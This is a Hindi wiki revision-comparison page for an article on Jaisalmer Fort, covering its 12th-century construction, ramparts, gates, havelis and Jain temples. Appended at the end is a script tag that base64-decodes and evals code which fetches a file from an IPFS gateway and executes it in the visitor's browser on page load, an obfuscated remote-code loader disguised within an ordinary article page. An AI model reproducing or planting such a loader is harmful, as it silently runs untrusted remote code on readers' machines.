Difference between revisions of "जैसलमेर क़िला"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
Line 1: Line 1:
{{लेख सूची
+
[[चित्र:Jaisalmer-Fort.jpg|thumb|250px|जैसलमेर का क़िला, [[जैसलमेर]]]]
|लेख का नाम= जैसलमेर
 
|पर्यटन= जैसलमेर पर्यटन
 
|ज़िला= जैसलमेर ज़िला
 
|प्रवास= जैसलमेर प्रवास
 
}}
 
[[चित्र:Jaisalmer-Fort.jpg|thumb|250px|जैसलमेर का क़िला, [[जैसलमेर]]<br />Jaisalmer Fort, Jaisalmer]]
 
 
*बारहवीं सदीं में सुनहरे पत्थरों से बना यह क़िला [[राजस्थान]] में दूसरा सबसे पुराना क़िला है और बड़ी संख्या में देशी विदेशी पर्यटक इसे देखने आते हैं।  
 
*बारहवीं सदीं में सुनहरे पत्थरों से बना यह क़िला [[राजस्थान]] में दूसरा सबसे पुराना क़िला है और बड़ी संख्या में देशी विदेशी पर्यटक इसे देखने आते हैं।  
*जैसलमेर के प्रमुख ऐतिहासिक स्मारकों में सर्वप्रमुख यहाँ का क़िला है। जैसलमेर का क़िला 1156 ई. में निर्मित हुआ था।  
+
*[[जैसलमेर]] के प्रमुख ऐतिहासिक स्मारकों में सर्वप्रमुख यहाँ का क़िला है। जैसलमेर का क़िला 1156 ई. में निर्मित हुआ था।  
 
*जैसलमेर के क़िला स्थापत्य का सुंदर नमूना है। इसमें बारह सौ घर हैं।
 
*जैसलमेर के क़िला स्थापत्य का सुंदर नमूना है। इसमें बारह सौ घर हैं।
 
*जैसलमेर क़िले की अपनी ख़ासियत है, ढाई सौ फुट की ऊँचाई वाला यह क़िला तीस फुट ऊँची प्राचीरों से घिरा हुआ है।  
 
*जैसलमेर क़िले की अपनी ख़ासियत है, ढाई सौ फुट की ऊँचाई वाला यह क़िला तीस फुट ऊँची प्राचीरों से घिरा हुआ है।  
 
*ग़ौरतलब बात ये है कि जैसलमेर की पूरी आबादी इसी क़िले की चहारदीवारी के अंदर ही बसी हैं।<ref>{{cite web |url=http://www.bbc.co.uk/hindi/southasia/030530_fort_explosive_mk.shtml |title=जैसलमेर क़िला सील किया |accessmonthday=[[6 अक्टूबर]] |accessyear=[[2010]] |last= |first= |authorlink= |format=एच.टी.एम.एल |publisher=बी. बी. सी |language=[[हिन्दी]] }}</ref>
 
*ग़ौरतलब बात ये है कि जैसलमेर की पूरी आबादी इसी क़िले की चहारदीवारी के अंदर ही बसी हैं।<ref>{{cite web |url=http://www.bbc.co.uk/hindi/southasia/030530_fort_explosive_mk.shtml |title=जैसलमेर क़िला सील किया |accessmonthday=[[6 अक्टूबर]] |accessyear=[[2010]] |last= |first= |authorlink= |format=एच.टी.एम.एल |publisher=बी. बी. सी |language=[[हिन्दी]] }}</ref>
 
==विशेषता==
 
==विशेषता==
जैसलमेर के किले का निर्माण 1156 में किया गया था और यह राजस्‍थान का दूसरा सबसे पुराना राज्‍य है। ढाई सौ फीट ऊंचा और सेंट स्‍टोन के विशाल खण्‍डों से निर्मित 30 फीट ऊंची दीवार वाले इस किले में 99 प्राचीर हैं, जिनमें से 92 का निर्माण 1633 और 1647 के बीच कराया गया था। इस किले के अंदर मौजूद कुंए पानी का निरंतर स्रोत प्रदान करते हैं। [[रावल जैसल]] द्वारा निर्मित यह किला जो 80 मीटर ऊंची त्रिकूट पहाड़ी पर स्थित है, इसमें महलों की बाहरी दीवारें, घर और मंदिर कोमल पीले सेंट स्‍टोन से बने हैं। इसकी संकरी गलियां और चार विशाल प्रवेश द्वार है जिनमें से अंतिम एक द्वार मुख्‍य चौक की ओर जाता है जिस पर महाराज का पुराना महल है। इस कस्‍बे की लगभग एक चौथाई आबादी इसी किले के अंदर रहती है। यहां गणेश पोल, सूरज पोल, भूत पोल और हवा पोल के जरिए पहुंचा जा सकता है। यहां अनेक सुंदर [[कलात्मक हवेलियाँ जैसलमेर|हवेलियां]] और जैन मंदिरों के समूह हैं जो 12वीं से 15वीं शताब्‍दी के बीच बनाए गए थे।<ref>{{cite web |url=http://bharat.gov.in/knowindia/jaisalmer.php |title=जैसलमेर का किला |accessmonthday=[[18 मार्च]] |accessyear=[[2011]] |last= |first= |authorlink= |format=पी.एच.पी |publisher=bharat.gov.in |language=[[हिन्दी]] }}</ref>
+
जैसलमेर के क़िले का निर्माण 1156 में किया गया था और यह राजस्‍थान का दूसरा सबसे पुराना राज्‍य है। ढाई सौ फीट ऊंचा और सेंट स्‍टोन के विशाल खण्‍डों से निर्मित 30 फीट ऊंची दीवार वाले इस किले में 99 प्राचीर हैं, जिनमें से 92 का निर्माण 1633 और 1647 के बीच कराया गया था। इस किले के अंदर मौजूद कुंए पानी का निरंतर स्रोत प्रदान करते हैं। [[रावल जैसल]] द्वारा निर्मित यह क़िला जो 80 मीटर ऊंची त्रिकूट पहाड़ी पर स्थित है, इसमें महलों की बाहरी दीवारें, घर और मंदिर कोमल पीले सेंट स्‍टोन से बने हैं। इसकी संकरी गलियां और चार विशाल प्रवेश द्वार है जिनमें से अंतिम एक द्वार मुख्‍य चौक की ओर जाता है जिस पर महाराज का पुराना महल है। इस कस्‍बे की लगभग एक चौथाई आबादी इसी क़िले के अंदर रहती है। यहां गणेश पोल, सूरज पोल, भूत पोल और हवा पोल के जरिए पहुंचा जा सकता है। यहां अनेक सुंदर [[कलात्मक हवेलियाँ जैसलमेर|हवेलियां]] और जैन मंदिरों के समूह हैं जो 12वीं से 15वीं शताब्‍दी के बीच बनाए गए थे।<ref>{{cite web |url=http://bharat.gov.in/knowindia/jaisalmer.php |title=जैसलमेर का किला |accessmonthday=[[18 मार्च]] |accessyear=[[2011]] |last= |first= |authorlink= |format=पी.एच.पी |publisher=bharat.gov.in |language=[[हिन्दी]] }}</ref>
  
==वीथिका==
 
<gallery widths="200">
 
चित्र:Jaisalmer-Fort-3.jpg|जैसलमेर का क़िला, [[जैसलमेर]]<br />Jaisalmer Fort, Jaisalmer
 
चित्र:Jaisalmer-Fort-2.jpg|जैसलमेर का क़िला, [[जैसलमेर]]<br />Jaisalmer Fort, Jaisalmer
 
</gallery>
 
{{प्रचार}}
 
 
{{लेख प्रगति  
 
{{लेख प्रगति  
 
|आधार=
 
|आधार=
Line 27: Line 15:
 
|शोध=
 
|शोध=
 
}}
 
}}
{{संदर्भ ग्रंथ}}
+
==वीथिका==
 +
<gallery>
 +
चित्र:Jaisalmer-Fort-3.jpg|जैसलमेर का क़िला, [[जैसलमेर]]
 +
चित्र:Jaisalmer-Fort-2.jpg|जैसलमेर का क़िला, [[जैसलमेर]]
 +
</gallery>
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>

Revision as of 10:19, 11 February 2012

[[chitr:Jaisalmer-Fort.jpg|thumb|250px|jaisalamer ka qila, jaisalamer]]

  • barahavian sadian mean sunahare pattharoan se bana yah qila rajasthan mean doosara sabase purana qila hai aur b di sankhya mean deshi videshi paryatak ise dekhane ate haian.
  • jaisalamer ke pramukh aitihasik smarakoan mean sarvapramukh yahaan ka qila hai. jaisalamer ka qila 1156 ee. mean nirmit hua tha.
  • jaisalamer ke qila sthapaty ka suandar namoona hai. isamean barah sau ghar haian.
  • jaisalamer qile ki apani khasiyat hai, dhaee sau phut ki ooanchaee vala yah qila tis phut ooanchi prachiroan se ghira hua hai.
  • gauratalab bat ye hai ki jaisalamer ki poori abadi isi qile ki chaharadivari ke aandar hi basi haian.[1]

visheshata

jaisalamer ke qile ka nirman 1156 mean kiya gaya tha aur yah rajash‍than ka doosara sabase purana rajh‍y hai. dhaee sau phit ooancha aur seant sh‍ton ke vishal khanh‍doan se nirmit 30 phit ooanchi divar vale is kile mean 99 prachir haian, jinamean se 92 ka nirman 1633 aur 1647 ke bich karaya gaya tha. is kile ke aandar maujood kuane pani ka nirantar srot pradan karate haian. raval jaisal dvara nirmit yah qila jo 80 mitar ooanchi trikoot paha di par sthit hai, isamean mahaloan ki bahari divarean, ghar aur mandir komal pile seant sh‍ton se bane haian. isaki sankari galiyaan aur char vishal pravesh dvar hai jinamean se aantim ek dvar mukhh‍y chauk ki or jata hai jis par maharaj ka purana mahal hai. is kash‍be ki lagabhag ek chauthaee abadi isi qile ke aandar rahati hai. yahaan ganesh pol, sooraj pol, bhoot pol aur hava pol ke jarie pahuancha ja sakata hai. yahaan anek suandar haveliyaan aur jain mandiroan ke samooh haian jo 12vian se 15vian shatabh‍di ke bich banae ge the.[2]


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

vithika

tika tippani aur sandarbh

  1. jaisalamer qila sil kiya (hindi) (ech.ti.em.el) bi. bi. si. abhigaman tithi: 6 aktoobar, 2010.
  2. jaisalamer ka kila (hindi) (pi.ech.pi) bharat.gov.in. abhigaman tithi: 18 march, 2011.

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>